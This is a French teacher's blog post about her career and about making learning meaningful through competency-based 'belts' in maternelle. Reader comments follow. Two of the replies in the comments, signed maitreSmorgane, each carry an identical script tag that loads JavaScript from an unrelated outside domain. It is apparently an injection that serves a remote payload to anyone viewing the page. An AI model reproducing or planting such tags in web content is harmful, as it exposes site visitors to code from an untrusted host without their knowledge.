• Donner du sens aux apprentissages: oui, mais comment ?!

    Avant d'essayer de répondre à cette question complexe, laissez-moi vous décrire un peu mon parcours de maitreS.

    Tout a débuté pour moi en 2003 avec une ouverture de classe en TPS/PS/MS. Sur le coup, je me suis dit "L'HORREUR"!!!

    Donner du sens aux apprentissages: oui, mais comment?!

    En effet, dans ma tête, j'avais tout imaginé sauf de la maternelle...

    Et bien je peux vous dire que cela a été une révélation pour moi!

    Ma maman étant instit majoritairement en cycle 3, il était évident pour moi que ce serait le cycle que je préfèrerais.

    Je me suis complètement trompée!

    Pour ma 2ème année, j'ai hérité d'un poste de remplaçante...

    Je peux vous dire que l'attente du coup de téléphone tous les matins, très peu pour moi, merci!

    Je suis trop angoissée pour cela!

    Mais encore une fois, j'ai eu de la chance! J'ai effectué un remplacement toute une année dans une classe de MS/GS et mon amour pour la maternelle s'est confirmé.

    Puis, ne réussissant pas à obtenir un poste dans un rayon d'une trentaine de km de chez moi, j'ai erré pendant une dizaine d'années sur des postes fractionnés de décharge de direction, de complément de temps partiel, de complément de maître formateur...

    Encore une fois, beaucoup de classes de maternelle au début, puis de plus en plus d'élémentaire, à mon grand regret...

    Cette période fut longue, interminable même, mais tellement formatrice!

    Je crois que je connais presque toutes les écoles de ma circo et j'ai balayé tous les niveaux!

    Je peux vous dire à présent que je ne suis pas fan du cycle 3...

    J'adore le cycle 2 mais mon attachement reste pour le cycle 1!

    C'est surtout en élémentaire que j'ai pu constater le bonheur de pouvoir enseigner en maternelle: beaucoup plus de flexibilité, beaucoup plus de liberté, beaucoup plus d'innocence aussi...

    J'ai alors obtenu un poste fixe dans l'école de ma commune!

    J'ai d'abord eu un CE2 pur à 19 (le rêve), puis j'ai eu un CE2/CM1, un CE1/CM1 et un CE2/CM1 de nouveau.

    J'ai essayé de faire ce que j'ai pu pour amener de ma chère maternelle chez les plus grands, avec les moyens du bord, car je ne me sentais pas à l'aise dans cette pédagogie frontale où l'enseignant domine et les élèves écoutent  "sagement".

    Je me suis alors lancée dans les centres d'autonomie et la classe flexible.

    J'ai dépensé beaucoup d'énergie (et d'argent, il faut bien le dire) pour essayer de mettre en place un climat d'apprentissage plus propice.

    Et puis, patatras...fermeture de classe dans mon école et évidemment, c'est tombé sur moi!

    Gros désarroi au début et grosse joie au final: j'obtiens enfin au bout de 15 ans un poste en maternelle, à 5 min de chez moi!

    Je revis!

    Il faut donc se remettre dedans, le temps d'un été.

    Lire... beaucoup lire...

    Chercher...

    Et aussi découvrir.

    C'est là que les super MaitreS entrent en jeu.

    Je me rends compte durant ces 2 mois de vacances avant mon grand retour en maternelle que je n'ai plus envie d'enseigner comme à mes débuts.

    De par mes lectures et mes discussions avec les MaitreS, j'ai un nouvel éclairage: je n'ai plus envie d'enseigner juste pour enseigner, j'ai envie que les élèves, les enfants soient le moteur même de cet enseignement.

    Mais comment faire?

    J'ai commencé par un aménagement de ma classe.

    Tout d'abord par souci d'en prendre possession et de m'y sentir chez moi mais aussi pour essayer de ne garder que l'essentiel.

    J'ai donc tout sorti de ma classe! Oui, oui, je vous le jure.

    J'ai tout mis dans le couloir, la salle de motricité... Il y en avait partout.

    Et j'ai commencé à faire du tri, à voir quels meubles, quels jeux ...etc j'allais garder.

    Entre la rentrée et Noël, j'ai changé un nombre incalculable de fois la configuration de ma classe.

    Je ne sais toujours pas si j'ai trouvé la bonne, mais une chose est sûre, les enfants y sont bien et moi aussi!

    J' ai 25 MS/GS dans une petite classe. J'ai donc investi la salle de motricité avec la permission de ma collègue de TPS/PS.

    Pour moi, l'organisation spatiale est primordiale dans le processus d'apprentissage.

    Il faut penser sa classe, penser chaque meuble, chaque objet, chaque matériel pour savoir si cela va être utile et fonctionnel pour les enfants.

    J'ai encore trop de choses "néfastes" dans ma classe, mais je n'y suis que depuis 1 an et travaillant à temps partiel, il faut aussi m'adapter aux désidératas de ma décharge.

    Une fois l'organisation spatiale faite, je me suis penchée sur l'organisation temporelle.

    Et c'est mon gros point noir...

    Cela fait 15 ans que je suis instit et 15 ans que j'essaie de faire de belles programmations / progressions (je ne comprends toujours pas quelle est la différence???) et que je ne m'y tiens jamais!!!

    Donner du sens aux apprentissages: oui, mais comment?!

    C'est peut-être pour ça que je n'allais pas au bout des programmes en élémentaire?!!!!

    Plus sérieusement, en maternelle, j'aime aller dans le sens du vent soufflé par mes petits élèves, évoluer au gré de leurs envies, de leurs besoins, et de ce qu'ils apportent au quotidien.

    Alors, oui, il y a le programme... Le fameux!

    C'est clair qu'il faut que j'y sois plus attentive...

    C'est pour cela que j'ai demandé un jour d'été 2019 sur un groupe Facebook, qui était partant pour élaborer des progressions, non pas en terme de périodes comme on a l'habitude de voir, mais en terme de compétences.

    C'est comme cela que nous nous sommes rencontrées avec les MaitreS !

    Bon, le problème, c'est que depuis presque un an maintenant, nous avons échangé et partagé sur énormément de sujets, mais nous n'avons absolument pas avancé sur notre idée de programmations par compétences!!!!

    Donner du sens aux apprentissages: oui, mais comment?!

    Mais, je ne lâche pas l'affaire et j'espère que mes super MaitreS seront de nouveau motivées pour nous y remettre.

    Pourquoi travailler par compétences?

    J'ai eu une discussion très intéressante avec des collègues de cycles 2 et 3 qui travaillent sur l'élaboration de ceintures de compétences. Vous les connaissez peut-être, ce sont celles de la Team Wonder School.

    Je vous conseille d'aller faire un petit tour sur leur site, c'est une vrai mine d'or, même si les publications se font tarder (ça c'est de ma faute, c'est moi qui gère le site....!).

    Cela fait plus d'un an qu'elles sont sur le projet, depuis février 2019 et elles entrevoient de le faire évoluer.

    Je trouve leur raisonnement extrêmement intéressant et tout à fait transposable en maternelle (hein les copines MaitreS?!!!).

    Elles en sont arrivées à se dire qu'un système de ceintures (ou d'étoiles ou autres) limite les élèves dans le sens qu'ils donnent à leurs apprentissages.

    En effet, prenons l'exemple de Marie qui vient de réussir son test pour la ceinture jaune de grammaire.

    "Maitresse, je suis contente, je suis ceinture jaune de grammaire à présent!"

    "Super Marie, mais que cela signifie-t-il pour toi?"

    "Ben, je ne sais pas maîtresse..."

    Là est la faille quelque part. Les enfants progressent, chacun à leur rythme mais ils ne mettent aucun sens derrière.

    Et je pense qu'il en est de même pour les enfants en maternelle.

    Même en individualisant les parcours, en respectant les rythmes de chacun, est-on sûr que chaque enfant saura pourquoi il fait telle ou telle chose et dans quel but?

    C'est à ce moment précis qu'entrent en jeu les compétences!

    Et si nous proposions aux élèves, aux enfants, de s'exercer sur des compétences plutôt que des notions?

    Cela leur permettrait également de pouvoir avancer sur plusieurs compétences en même temps, sans attendre qu'une notion soit acquise pour passer à la suivante.

    Si, au lieu d'avoir des ceintures (ou des étoiles hein, peu importe), de différentes couleurs en calcul par exemple, nous avions une ceinture addition, une ceinture soustraction, une ceinture multiplication et une ceinture division, avec au sein de chaque ceinture une progression imagée par des couleurs pourquoi pas?

    Cet exemple est pour les plus grands mais tout à fait transposable en maternelle je pense.

    Cela voudrait dire que notre chère Marie pourrait avoir commencé sa ceinture d'addition et entamer également celle de soustraction si cela lui chante, sans attendre d'avoir terminé sa ceinture d'addition.

    Personnellement, ce concept me séduit beaucoup et je rêve de pouvoir le mettre en place en maternelle!

    Qui me suit dans les MaitreS???!!!!

    Et vous, comment faites-vous pour donner du sens aux apprentissages ?

     

    Donner du sens aux apprentissages: oui, mais comment?!

    Et pour ceux qui n'y comprennent rien de rien en programmation, progression, progressivité des apprentissages, comme moi, voici un document du site preparerlecrpe.com

     

    « Bullet agenda 2020 2021Parce qu'après tout, lire rime avec rire et plaisir ! »
    Pin It

    Tags Tags : , ,
  • Commentaires

    4
    Lundi 20 Avril à 20:55

    Comme depuis le début de notre parcours toutes les 2, et maintenant à 9, je suis partante pour te suivre dans cette  aventure !

      • maitreSmorgane
        Mardi 21 Avril à 18:49

        Merci chère MaitreS!

        <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
      • maitreSmorgane
        Mardi 21 Avril à 18:48

        Cool! Tu vas m'aider hein?!

        <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
      • Lundi 20 Avril à 21:50

        Tu te rapproches fortement du plan de travail ;)

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :